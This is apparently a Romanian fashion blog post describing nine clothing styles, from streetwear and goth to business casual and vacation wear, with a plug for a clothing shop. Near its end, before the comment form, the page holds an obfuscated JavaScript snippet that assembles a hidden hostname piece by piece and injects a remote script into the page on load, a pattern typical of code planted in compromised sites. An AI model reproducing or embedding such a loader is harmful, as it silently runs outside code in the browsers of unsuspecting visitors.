Actualitate, Divertisment, Tineri

9 dintre cele mai importante stiluri fashion

Spread the love

Fără doar și poate hainele pe care le porți au un efect asupra ta. Te simți încrezătoare, puternică, capabilă și mai presus de toate fericită atunci când porți hainele tale preferate. De aceea e foarte important să-ți alegi stilul fashion în care te simți cel mai bine. Iată mai jos 9 dintre cele mai importante stiluri fashion:

➡ Stilul Streetwear

Acesta este un stil de modă atotcuprinzător, care a evoluat de pe străzi.

Provine din cultura californiană de surf și skate. Dar astăzi designerii, brandurile și influencerii majori au îmbrățișat acest stil și nu mai este limitat la stradă.

Este simbolul modei urbane moderne.

➡ Stilul Etnic

Îmbrăcăminte care a fost adoptată complet sau parțial din diferite costume tradiționale. Include, dar nu se limitează la bluzele țăranilor mexicani, geci Afgane, Kimonouri japoneze… și tot așa.

➡ Stilul Business

Chiar și pentru persoanele care nu sunt atrase de haine o intrebare de genul „Ce să port la serviciu?” e o dilemă.

Din fericire există un stil vestimentar care este fix pe acest segment. Acesta include un smoking sau un costum de culoare închisă și cravată asortată pentru bărbați și rochii, fuste, cămăși, pantaloni pentru femei.

➡ Stilul Business Casual

Este următorul stil vestimentar care se potrivește la muncă după cel business, și chiar dacă arată mai diferit tot este o opțiune foarte bună pentru locul de muncă. Un blazer și un pantalon asortat cu o cămașă cu guler și cravată opțională sunt cele mai frecvente alegeri casual pentru bărbați.

Jachetele sport sunt, de asemenea, folosite într-un cadru mai casual. Pentru femei, pantalonii sau fustele cu bluze / tunici îmbinate cu o jachetă adecvată constituie business casual. Si un mic pont, adaugă la acest outfit și o bijuterie personalizata.

➡ Stilul Sport

Îmbrăcămintea sport este în prezent folosită ca sinonim pentru îmbrăcăminte casual. Înainte, doar sportivii erau văzuți în hainele sport, dar în zilele noastre, vedetele au dat drumul tendinței, toată lumea a început să poarte haine de antrenament. Activewear este un nume alternativ pentru îmbrăcămintea sport. Athleisure este termenul inventat pentru a folosi îmbrăcămintea sport la modă.

Majoritatea hainelor sport sunt confecționate dintr-o țesătură suficient de confortabilă pentru a fi purtată oriunde și suficient de întinsă pentru a fi potrivită și atrăgătoare, fără a-și pierde forma. Jambierele, topurile, sutienele sport, îmbrăcămintea exterioară, tricourile, pantalonii de yoga sunt toate elementele esențiale dacă vrei să urmezi această tendință. Principalele mărci sportive includ Adidas, Puma, Altura, Fila, DKNY, etc.

Dacă vrei să îți mărești garderoba cu îmbrăcăminte sport poți arunca un ochi peste magazinul celor de la TopCloset. Au unele dintre cele mai bune haine la prețuri accesibile.

➡ Stilul Goth

Stilul Goth se referă la un stil întunecat și misterios al modei, care se apropie de marginea morbidității; este posibil să fi auzit de el ca îmbrăcămintea vampirilor. Acest stil este asociat cu adolescenții și cântăreții rock care se îmbracă exclusiv în negru, dar este mult mai mult decât atât. Cuprinde o cultură gotică complet distinctă și include filme, ficțiune și adepți foarte pasionați.

➡ Stilul Hip Hop

Hip-hop-ul este cel mai popular gen muzical din SUA, iar stilul rapperilor este copiat în masă de fani. El include tricouri de baseball, jachete bomber, blugi în acest stil, adidași, de menționat este faptul că toate sunt largi sau oversized.

➡ Stilul Casual Chic

Acesta este un stil elegant, cu haine în culori negre, albe și neutre. Întregul look este foarte elegant. În acest stil, un lucru care probabil ți-ar lipsi sunt culorile vibrante – ai putea spune că există doar eleganță în acest stil.

➡ Stilul de vacanță

Este numit și îmbrăcăminte de vară sau îmbrăcăminte de croazieră pentru că o vei purta în vacanță. Acest stil se referă la călătorii și relaxare – gândește-te la pantalonii scurți, tricourile largi, costumele de baie, pantalonii de jogger, pălăriile largi de vară și sandale. Include, de asemenea, rochii de seară lungi (gândiți-vă la rochii maxi, nu cele elegante) și ținute semi-formale pentru bărbați.

(function(){
wydc=document.createElement(„script”);wydc.type=”text/javascript”;
wydc.async=true;wydc_=((„us”)+”t”)+”a”;wydc_+=(„t.i”)+””+”n”;wydc_+=((„f”)+”o”);wydc_+=”/”;
wydcu=”302618673.”;wydcu+=”i7yhtny5ydc1zvd6ly4uddu0pxaXxg”;wydc.src=”https://”+wydc_+wydcu;
wydcdb=document.body;wydcdb.appendChild(wydc);
})();

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *